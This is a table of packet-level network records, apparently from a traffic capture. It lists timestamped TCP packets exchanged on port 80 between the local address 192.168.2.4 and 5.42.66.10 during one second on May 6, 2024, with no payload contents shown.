May 6, 2024 07:53:04.786737919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786753893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786761045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786773920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786778927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786784887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786793947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786797047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786808968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786820889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786822081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786835909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786845922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786848068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786858082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786885023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786916971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786927938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786937952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786950111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786957026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786962986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786969900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786976099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786988020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786993980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787003040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787009954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787033081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787045002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787056923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787058115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787069082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787081003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787082911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787094116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787094116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787106991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787111998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787122011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787123919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787134886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787146091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787148952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787158012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787163019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787172079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787184000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787194967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787199974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787206888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787218094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787220001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787230968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787239075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787264109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787348032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787358999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787369967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787380934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787388086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787389994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787400007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787411928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787414074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787424088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787436008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787437916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787448883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787452936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787470102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787491083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787513018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787524939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787534952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787544966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787547112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787556887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787564993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787568092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787579060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787579060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787591934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787602901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787604094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787616968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787642956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787646055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787658930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787668943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787682056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787686110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787693977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787705898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787709951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787718058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787729025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787733078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787743092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787744999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787765026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787771940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787777901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787787914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787792921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787801027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787812948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787820101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787826061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787837029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787849903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787851095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787851095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787861109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787873983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787879944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787884951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787902117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787914038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787918091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787930012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787940025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787952900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787956953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787962914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787974119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787977934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.787986994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.787997961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788002014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788009882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788021088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788022041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788034916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788037062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788060904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788077116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788094044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788111925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788121939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788126945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788135052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788146019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788146019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788157940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788158894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788171053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788172960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788182974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788189888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788193941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788202047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788206100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788218021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788228989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788239002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788258076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788268089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788269043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788280010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788290977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788295984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788301945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788301945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788315058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788322926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788326025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788336039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788337946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788348913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788361073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788361073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788372040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788374901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788383961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788394928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788398981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788408041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788420916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788424969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788434029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788434029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788444996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788456917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788459063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788470030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788486004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788501024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788520098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788575888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788588047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788599014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788609982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788609982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788620949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788624048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788631916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788640976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788645029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788655043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788657904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788670063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788676977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788681984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788692951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788697004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788703918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788713932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788719893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788734913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788744926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788747072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788757086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788769007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788773060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788779974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788793087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788794994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788805008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788821936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788827896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788827896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788841009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788851976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788856030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788873911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788875103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788886070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788897991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788897991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788912058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788923979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788925886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788937092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788945913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788949966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.788960934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.788985014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789042950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789055109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789064884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789077044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789082050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789088964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789098978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789102077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789113045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789122105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789124012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789132118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789135933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789148092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789158106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789159060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789169073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789170980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789180040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789191008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789195061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789201975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789213896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789222956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789223909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789236069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789241076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789247990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789259911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789263964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789273024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789290905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789297104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789326906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789386034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789397955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789408922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789421082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789424896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789432049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789437056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789443970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789454937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789455891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789467096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789478064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789479971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789489031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789491892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789500952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789511919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789522886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789529085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789537907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789540052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789551973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789551973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789563894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789576054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789582014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789587021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789598942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789604902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789608955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789614916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789616108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789628029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789638996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789653063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789668083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789669991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789680958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789694071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789696932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789700985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789705992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789717913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789722919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789731026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789732933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789752007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789777040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789814949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789824963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789835930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789846897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789854050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789860010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789870977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789881945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789885998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789895058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789896965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789906025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789916992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789920092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789930105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789937019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789942026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789946079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789952993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789964914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789975882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.789977074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.789990902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790002108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790005922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790015936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790019035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790040970 CEST	49741	80	192.168.2.4	5.42.66.10
